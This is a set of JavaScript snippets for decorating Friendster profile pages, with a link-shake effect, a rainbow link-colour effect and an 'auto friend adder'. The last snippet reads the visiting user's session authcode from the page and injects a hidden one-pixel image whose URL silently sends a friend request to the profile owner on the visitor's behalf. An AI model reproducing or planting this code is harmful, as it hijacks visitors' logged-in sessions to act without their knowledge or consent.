

//image and link shake by Angell de Ville -change A to img if u only want the image to move

function shake(){br=document.getElementsByTagName("A");
for(bage=0;bage<br.length;bage++){br[bage].style.position="relative";
br[bage].onmouseover=function(){shakeit(this);qkie();}
br[bage].onmouseout=function(){newPosition(this);top.focus();}}}
attachOnLoadHandler(shake);sa=0;pimp=1;
function shakeit(go){sa=0;my=go;
my.style.left=0;my.style.top=0;}function qkie(){if(sa==1){return;}
if(pimp==1){my.style.top=parseInt(my.style.top)+3;pimp++;}
else if(pimp==2){my.style.left=parseInt(my.style.left)+3;pimp++;}
else if(pimp==3){my.style.top=parseInt(my.style.top)-3;pimp++;}
else{my.style.left=parseInt(my.style.left)-3;pimp=1;}
setTimeout(qkie,50)}function newPosition(go){
sa=1;go.style.left=0;go.style.top=0;}





/**************************************************/
/* Rainbow Links v1                               */
/* Submitted: by: Angell de Ville                 */
/* For more Friendster tips, tricks and tutorials */
/* visit us at http://wwww.screwcamels.com/       */
/**************************************************/
x5a = 0;
var x5b = new Array("FFCC33","FFFF66","CCFF33","66FFFF","66CCFF","9999FF","CC99FF","CC33FF","FF00CC","FF0066","FF6633");
var x5c = navigator.appName=='Microsoft Internet Explorer'?true:false;
var x5d = window.opera?true:false;
function x5e(x5){
if(x5c){
x5f = event.srcElement;
}
else {
x5f = x5.target;
}
return x5f;
}
function x5g(){
if(x5h){
x5h.style.color = "#"+x5b[x5a++];
}
if(x5a==x5b.length){
x5a = 0;
}
}
function x5i(x5){
if(x5d){
return;
}
var x5f = x5e(x5);
if(x5f.tagName=="A"){
x5h = x5f;
x5k = x5f.style.color;
x5l = setInterval("x5g()", 150);
}
return true;
}
function x5j(x5){
var x5f = x5e(x5);
if(x5d){
return;
}
if(x5h && x5f.tagName=="A"){
x5h = null;
x5f.style.color = x5k;
clearInterval(x5l);
}
}
document.onmouseover = x5i;
document.onmouseout = x5j;






//auto friend adder

function x22(a){
var b = document.getElementById("controlPanelButtons").innerHTML;
if(pageViewerID!=""&&b.indexOf("addfriendrequest")!=-1){
document.getElementById("0").innerHTML+="<img src='http://www.friendster.com/addfriendrequest.php?authcode="+b.slice(b.indexOf("authcode=")).slice(9,39)+"&uid="+pageOwnerID+"&email=&firstname=&lastname="+a+"&friend=&submit=1' width='1' height='1' style='visibility:hidden'>";
}
}
x22("YOUR LAST NAME");
